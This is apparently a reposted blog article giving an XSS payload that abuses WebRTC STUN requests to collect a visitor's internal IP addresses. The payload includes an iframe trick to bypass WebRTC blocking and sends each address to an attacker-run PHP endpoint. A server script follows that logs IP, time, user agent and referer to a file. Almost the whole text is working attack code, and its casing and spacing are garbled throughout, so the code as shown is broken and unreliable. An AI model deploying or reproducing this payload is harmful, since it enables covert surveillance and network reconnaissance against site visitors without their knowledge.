xss-using WEBRTC to get the intranet IP

Xss.jsfunction getips (callback) {                 var ip_dups = {};                 //compatibility for firefox and chrome                 var  Rtcpeerconnection = window. rtcpeerconnection                     | |  window.mozRTCPeerConnection                     | |  window.webkitRTCPeerConnection;                 var usewebkit = !! window.webkitrtcpeerconnection;                //bypass naive webrtc blocking using  an iframe                 if (! Rtcpeerconnection) {                     //NOTE: you need to have an iframe in  the page right above the script tag                     //                     //<iframe id = "iframe"  sandbox= "Allow-same-origin"  style= "Display: none" ></iframe>                     // <script&gt, .....getips called in here...                     //                     var win =  iframe.contentwindow;                     rtcpeerconnection = win. rtcpeerconnection                         | |  win.mozRTCPeerConnection                         | |  win.webkitRTCPeerConnection;                     usewebkit = !! Win.webkitrtcpeerconnection;                 }                / /minimal requirements for data connection                 var mediaConstraints = {                     optional : [{rtpdatachannels: true}]                 };                 var servers = {iceServers: [{urls:  "Stun:stun.services.mozilla.com"}]};                 //construct  a new rtcpeerconnection                 var pc = new rtcpeerconnection (servers, mediaconstraints);                 function handlecandidate ( Candidate) {                     //match just the IP address                     var ip_regex =  /([0-9]{1,3} (\.[ 0-9]{1,3}) {3}| [A-f0-9] {1,4} (: [a-f0-9]{1,4}) {7}) /                     var ip_addr = ip_regex.exec (candidate) [1];                     //remove duplicates                     if (ip_dups[ip_addr] === undefined)                           callback (IP_ADDR);                     ip_dups[ip_addr] = true;                 }                 //listen for candidate events                 pc.onicecandidate  = function (ICE) {                     //skip non-candidate events                     if (ice.candidate)                           handlecandidate (ice.candidate.candidate);                 };                 //create a bogus data channel                 pc.createdatachannel ("");                 //create an offer sdp                 pc.createoffer (function (Result) {                     //trigger the stun server request                     pc.setlocaldescription (result,  function () {}, function () {});                 }, function () {});                 //wait for a while to let everything  Done                settimeout (function () {                     //read candidate info from local description                     var lines =  Pc.localDescription.sdp.split (' \ n ');                     lines.foreach (line) {                          if (Line.indexof (' a=candidate: ')  === 0)                               handlecandidate (line);                     });                 }, 1000);             }            //insert ip addresses into the  Pagegetips (function (IP) {    var url= "http://192.168.80.133:81/aaa.php?ip=" +ip;     var xmlhttp1=new xmlhttprequest ();      xmlhttp1.open ("GET ",  url, true);     xmlhttp1.setrequestheader (" Content-type ", " application/ X-www-form-urlencoded ");     xmlhttp1.send (null);   });

Server side:

<?php$ip=$_get[' IP ']; $time =date ("J F, Y, g:i a"); $agent = $_server[' http_user_agent ']; $referer =getenv (' Http_ REFERER '); $text = ' IP: ' =. $ip. " \ r \ n ". ' Time: '. $time. ' \ r \ n ". ' User Agent: '. $agent. ' \ r \ n ". ' Referer: '. $referer. ' \ r \ n "; $file = fopen (' vb.php ', ' A + '); fwrite ($file, $text); fclose ($file);? >

This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1734490

xss-using WEBRTC to get the intranet IP